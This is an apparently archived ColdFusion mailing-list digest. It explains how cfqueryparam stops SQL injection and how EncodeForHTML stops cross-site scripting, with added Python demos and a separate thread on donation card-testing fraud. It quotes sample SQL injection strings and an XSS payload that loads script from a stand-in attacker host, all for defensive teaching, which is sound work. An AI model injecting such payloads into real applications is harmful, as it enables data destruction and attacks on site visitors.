RE: cfqueryparam & EncodeForHTML

2014-11-04 Thread Stephens, Larry V

I did - many times before I sent the message. So, explain, please.

From CF: (cfqueryparam) Verifies the data type of a query parameter ...

My example is a text field. The potential inject/bad data language is text. I 
just tested it and cfqueryparam did not prevent me from entering potentially 
bad data into the table.

 
Larry V. Stephens

-Original Message-
From: .jonah [mailto:jonah@creori.com] 
Sent: Monday, November 03, 2014 9:46 PM
To: cf-talk
Subject: Re: cfqueryparam & EncodeForHTML


Read up on how query param works. It will protect against Johnson & Johnson's;delete *

Order the Adobe Coldfusion Anthology now!
http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion
Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:359557
Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm


Re: cfqueryparam & EncodeForHTML

2014-11-04 Thread Byron Mann

cfqueryparam will not prevent the malicious data from getting entered into
the table. However, it does prevent the malicious text from executing as
T-SQL. cfqueryparam does not parse or cleanse data in any way.

Basically, it passes the text as a variable to the SQL statement, thus
preventing any malicious code in the text from executing.

So instead of T-SQL actually executing like this:

select * from myTable where x='some'; delete * from myTable --'

cfqueryparam is actually running T-SQL something like this:

select * from myTable where x = @aVar

CF and the database driver are assigning @aVar your text string:

@aVar = some'; delete * from myTable --

So the value of the string inside the variable can never be executed, as it
is not part of the actual T-SQL syntax; it is just a variable value at that point.

You can specify a data type to the query param. So if you specified
cf_sql_integer and attempted to insert text with that parameter, you would
get a T-SQL error, data type mismatch of sorts.

Hope this helps explain a bit.

~Byron
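An added example, not code from the thread, showing Byron's point with Python's sqlite3 driver standing in for cfqueryparam: the hostile string is bound as data, so it is stored verbatim and nothing inside it runs. The integer check is an assumed stand-in for cfsqltype="cf_sql_integer", and the sample rows are constructed.

```python
import sqlite3

# Constructed sample input: the "hacked" entry from the thread.
HOSTILE = "Johnson & Johnson's; delete * from myTable --"


def new_table():
    con = sqlite3.connect(":memory:")
    con.execute("create table myTable (id integer primary key, x text)")
    con.executemany("insert into myTable (x) values (?)",
                    [("Acme",), ("Initech",)])
    return con


def store(con, value):
    # Parameterized, as cfqueryparam does: the statement text the engine
    # parses is fixed, and `value` is bound as data afterwards, so the
    # "; delete ..." inside it is never SQL syntax.
    con.execute("insert into myTable (x) values (?)", (value,))
    con.commit()


def lookup(con, value):
    # The same binding on read: the string comes back exactly as stored.
    rows = con.execute("select x from myTable where x = ?", (value,))
    return [row[0] for row in rows]


def row_count(con):
    return con.execute("select count(*) from myTable").fetchone()[0]


def accepts_as_integer(value):
    # Assumed stand-in for cfsqltype="cf_sql_integer": the type is checked
    # before binding, so text aimed at an integer parameter is rejected
    # up front instead of reaching the database.
    try:
        int(str(value).strip())
        return True
    except ValueError:
        return False


def demo():
    con = new_table()
    store(con, HOSTILE)
    return {"rows": row_count(con),               # 3: nothing was deleted
            "stored": lookup(con, HOSTILE),        # the literal string
            "int_param_accepts_text": accepts_as_integer(HOSTILE)}


if __name__ == "__main__":
    print(demo())
```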


Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:359558


Re: cfqueryparam & EncodeForHTML

2014-11-04 Thread Dave Watts

> Text input field
> Entry is Johnson & Johnson's
> I store it in a table using cfqueryparam. All is good.
>
> Let's say the hacked entry is Johnson & Johnson's;delete * (or something akin
> to that - you get the drift). I use cfqueryparam but it won't catch the hack;
> it's still just a string.

Actually, it will prevent the value from being used to execute
malicious SQL. To me, that's catching the hack. Converting the
entire value to a string prevents the hack from working.

> At some point, before storing or after retrieval, I use EncodeForHTML to make
> that safe. Now I have either ...

I'm not sure what you're trying to accomplish. If it's to remove the
part of the value containing something that would be malicious SQL if
it were executable, you have to determine what exactly is that part of
the string, and how you differentiate it from other parts of the value
that wouldn't be malicious SQL if they were executable. But at this
point, this has nothing to do with safety unless your application
sends the string as-is to another application which isn't
parameterizing its SQL statements.

Dave Watts, CTO, Fig Leaf Software
1-202-527-9569
http://www.figleaf.com/
http://training.figleaf.com/

Fig Leaf Software is a Service-Disabled Veteran-Owned Small Business
(SDVOSB) on GSA Schedule, and provides the highest caliber vendor-
authorized instruction at our training centers, online, or onsite.

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:359559


Re: cfqueryparam & EncodeForHTML

2014-11-04 Thread Claude Schnéegans

> Like querying malicious data and using it in another
> cfquery without cfqueryparam.

As an extra safety feature, if your application does not use multi-SQL
statements at all, and depending on the type of database engine used, you could
also simply deactivate the multi-statement facility.
If you're using an Access database, you don't even have to deactivate it: there
is NO multi-statement facility.


Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:359560


Re: cfqueryparam & EncodeForHTML

2014-11-04 Thread Russ Michaels

What you really need is a Web Application Firewall, which will clean all
form and URL params and strip out anything dodgy.
There are plenty of generic web server WAFs, or if you want a CF-specific
solution then try FuseGuard.


On Tue, Nov 4, 2014 at 5:26 PM,  wrote:


> Like querying malicious data and using it in another
> cfquery without cfqueryparam.
>
> As an extra safety feature, if your application does not use multi-SQL
> statements at all, and depending on the type of database engine used, you
> could also simply deactivate the multi-statement facility.
> If you're using an Access database, you don't even have to deactivate it:
> there is NO multi-statement facility.


 

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:359561


Re: cfqueryparam & EncodeForHTML

2014-11-04 Thread Pete Freitag

cfqueryparam and EncodeForHTML are used to prevent two different types of
attack.

cfqueryparam is for SQL injection attacks, as Byron explained.

EncodeForHTML is used to prevent cross-site scripting attacks (it does not
prevent/escape SQL injection), which exist when the attacker can execute
arbitrary client-side code (such as JavaScript). Suppose we specified

companyName=Johnson & Johnson's<script src=//hackers.r.us/badstuff.js>

If you inserted that value into the db, everyone who views that record in
the DB may potentially execute the hacker's JavaScript file, which can do
lots of things, potentially on behalf of the currently authenticated user.

You don't necessarily need to run EncodeForHTML before inserting the data
into the database; you just need to make sure that you call EncodeForHTML
every time you output the variable. The reason for this is that you can end
up double encoding when you edit the record, or maybe you want to output
the value in another context such as an HTML attribute, in which case you want
to use EncodeForHTMLAttribute on the raw value instead. In some apps, though, it
can be a much easier solution to just encode it before inserting the data if it
is output in a million places.




--
Pete Freitag - Adobe Community Professional
http://foundeo.com/ - ColdFusion Consulting & Products
http://hackmycf.com - Is your ColdFusion Server Secure?
http://www.youtube.com/watch?v=ubESB87vl5U - FuseGuard your CFML in 10 minutes


On Mon, Nov 3, 2014 at 3:41 PM, Stephens, Larry V steph...@iu.edu wrote:


> Text input field
> Entry is Johnson & Johnson's
> I store it in a table using cfqueryparam. All is good.
>
> Let's say the hacked entry is Johnson & Johnson's;delete * (or something
> akin to that - you get the drift). I use cfqueryparam but it won't catch the
> hack; it's still just a string.
>
> At some point, before storing or after retrieval, I use EncodeForHTML to
> make that safe. Now I have either
>
> Johnson &amp; Johnson&#x27;s
>
> or
>
> Johnson &amp; Johnson&#x27;s&#x3b;delete &#x2a;
>
> Supposedly, that's safe. Regex could strip out the delete or kill the
> thing when I tried to save the data in the first place, but I tried several
> examples and none seemed to work.
>
> The thing is, Johnson &amp; Johnson&#x27;s may display correctly on the
> screen but it's not good for a search function, particularly if I have a
> legacy database.
>
> To parody a commercial for a different product, what are you using for
> protection?
>
>
> Larry V. Stephen
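An added example, not from the thread or from any ColdFusion library, using Python's html.escape as a stand-in for EncodeForHTML. It shows Pete's advice of encoding at output on the raw stored value, the double encoding that appears when a value encoded before insert is encoded again on output, and Larry's search problem, where a pre-encoded row no longer equals the raw term. The company-name payload is constructed.

```python
import html

# Constructed sample input, not from the thread: an XSS attempt in a company name.
COMPANY = "Johnson & Johnson's<script>alert(1)</script>"


def encode_for_html(value):
    # Stdlib approximation of CF's EncodeForHTML: & < > " ' become entities,
    # so the browser treats the value as text rather than markup.
    return html.escape(value, quote=True)


def render_cell(stored_value):
    # Encode at output, every time, on whatever is in the database.
    return f"<td>{encode_for_html(stored_value)}</td>"


def render_edit_field(stored_value):
    # Attribute context on the edit form; with quotes escaped the raw value
    # can go straight back into the input without being encoded twice.
    return f'<input name="companyName" value="{encode_for_html(stored_value)}">'


def is_double_encoded(markup):
    # The symptom Pete describes: an already-encoded value encoded again
    # shows "&amp;amp;" (or "&amp;lt;", "&amp;#x27;") to the user.
    return any(tag in markup for tag in ("&amp;amp;", "&amp;lt;", "&amp;#x27;"))


def exact_search(stored_value, term):
    # Larry's search concern: a pre-encoded row no longer equals the raw term.
    return stored_value == term


def demo():
    raw_row = COMPANY                       # store raw, encode on output
    encoded_row = encode_for_html(COMPANY)  # encode before insert instead
    return {
        "cell_from_raw": render_cell(raw_row),
        "edit_field_from_raw": render_edit_field(raw_row),
        "raw_output_double_encoded": is_double_encoded(render_cell(raw_row)),
        "pre_encoded_output_double_encoded": is_double_encoded(render_cell(encoded_row)),
        "raw_row_matches_search": exact_search(raw_row, COMPANY),
        "pre_encoded_row_matches_search": exact_search(encoded_row, COMPANY),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```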

 

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:359562


Re: Non-profit donation providers

2014-11-04 Thread Rob Voyle

Hi Al

Thanks for this. I will pass the info on to the group I am working with.

Rob 

On 2 Nov 2014 at 11:16, Al Musella, DPM wrote:

 
> I use paypal.. Couldn't be easier, and they give a discount on the
> rates to nonprofits...
> however, there is one big problem...
>
> Bad people have been using my donation form to test stolen credit
> cards. They use the stolen credit cards to make a small donation to
> see if the cards work.  I have the security set so they need address
> verification as well as the security code and still many get
> through.
> When someone complains of fraud, paypal removes the donation and a
> big fee (around $25..  I forget the exact amount)... and threatens me
> that they will cut off my account if my fraud rate doesn't go down..
> I called them and they offer no help at all.
>
> So what I do now is have my server send an email to my phone when a
> donation is made. If it looks suspicious, I click a link in the email
> that will ban that IP address from making a successful donation
> (anything they try gets them a page that says the donation failed. )
> Then I go back and reverse any donations that got through with that
> IP address or amount around that time.  Most of the time they are all
> the same amount.. We have a $5 minimum, so they are mostly
> $5.  Before I had a minimum, they were usually $1.
>
> I also allow only 3 attempts per IP address per day.. even if
> successful - it will alert me and I check to verify the donations
> they made were good.
>
>> Hi Folks
>> Any recommendations for church/non-profit online donations,
>> especially recurring donations?
>>
>> Thanks
>> Rob
>> Robert J. Voyle, Psy.D.
>> Director, Clergy Leadership Institute
>> For Coaching and Training in Appreciative Inquiry
>> Author: Restoring Hope: Appreciative Strategies
>>   to Resolve Grief and Resentment
>> http://www.appreciativeway.com/
>> 503-647-2378 or 503-647-2382
>>
>> Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:359553




Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:359563